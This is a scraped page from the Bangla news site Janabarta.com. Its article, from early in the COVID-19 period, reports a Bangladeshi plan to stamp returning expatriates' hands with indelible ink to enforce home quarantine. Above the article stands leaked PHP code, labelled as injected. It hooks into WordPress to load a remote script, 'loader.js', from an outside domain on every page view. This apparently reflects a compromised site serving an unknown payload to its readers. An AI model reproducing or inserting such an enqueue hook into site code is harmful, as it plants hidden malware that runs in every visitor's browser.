// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site প্রবাসী চিহ্নিতকরণে হাতে বসছে ‘বিশেষ সিল’! - Janabarta.com

প্রবাসী চিহ্নিতকরণে হাতে বসছে ‘বিশেষ সিল’!

জনবার্তা ডেস্কঃ করোনা সংক্রমণ রোধে স্বাস্থ্যমন্ত্রী জাহিদ মালেক জানিয়েছেন, দুই হাজার করোনাভাইরাস আক্রান্ত রোগীকে বর্তমানে চিকিৎসা দেয়ার ব্যবস্থা রয়েছে। বড় পরিসরের প্রয়োজন হলে সেনাবাহিনীর তত্ত্বাবধানে ইজতেমা ময়দানে কোয়ারেন্টাইনে সন্দেহভাজনদের নেয়া হবে। এবং সেখানে চিকিৎসা দেয়া হবে।

এছাড়া করোনাভাইরাসের (কোভিড-১৯) বিস্তার ঠেকাতে বিদেশ ফেরতদের ১৪ দিন নিজ বাড়িতে হোম কোয়ারেন্টাইনে থাকার নির্দেশ দিয়েছে সরকার। নির্দেশ অমান্যকারীদের সংক্রামক রোগ আইনে জরিমানাও করা হচ্ছে। তারপরও অনেকে ঘরে থাকছেন না। প্রায়ই রাস্তা-ঘাট, হাট-বাজার কিংবা দোকান-পাটে তাদের পাওয়া যাচ্ছে বলে খবর বেরিয়েছে। তাই প্রবাসীদের চিহ্নিত করতে এবার তাদের হাতে অমোছনীয় কালি দিয়ে সিল দেওয়ার পরিকল্পনা করছে সরকার।

বৃহস্পতিবার চট্টগ্রামে করোনাভাইরাস প্রতিরোধ বিষয়ক এক বৈঠকে এ তথ্য জানান চট্টগ্রামের জেলা প্রশাসক ইলিয়াস হোসেন।

তিনি বলেন, দেশে করোনাভাইরাসের বিস্তার ঠেকাতে এবং বিদেশ ফেরতদের ঘরের বাইরে যাওয়া ঠেকাতে তাদের হাতে অমোছনীয় কালি দিয়ে সিল দেওয়ার পরিকল্পনা করা হচ্ছে। মন্ত্রিপরিষদ থেকে এমন নির্দেশনা দেওয়া হয়েছে।

এর আগে ভারতের মহারাষ্ট্রে এমন সিদ্ধান্ত নিতে দেখা গেছে। সেখানে করোনাভাইরাসের লক্ষণ থাকা ব্যক্তিদের হোম কোয়ারেন্টাইন থেকে পালানো ঠেকাতে তাদের হাতে বিশেষ সিল মেরে দেওয়া হয়।

উল্লেখ্য, বাংলাদেশে করোনাইরাসে আক্রান্ত হয়ে এখন পর্যন্ত একজনের মৃত্যু এবং ১৭ জন সংক্রমিত হওয়ার বিষয় নিশ্চিত করেছে সরকার। তবে এর মধ্যে ৩ জন ইতোমধ্যে হাসপাতালে চিকিৎসা নিয়ে সুস্থ হয়ে বাড়ি ফিরে গেছে।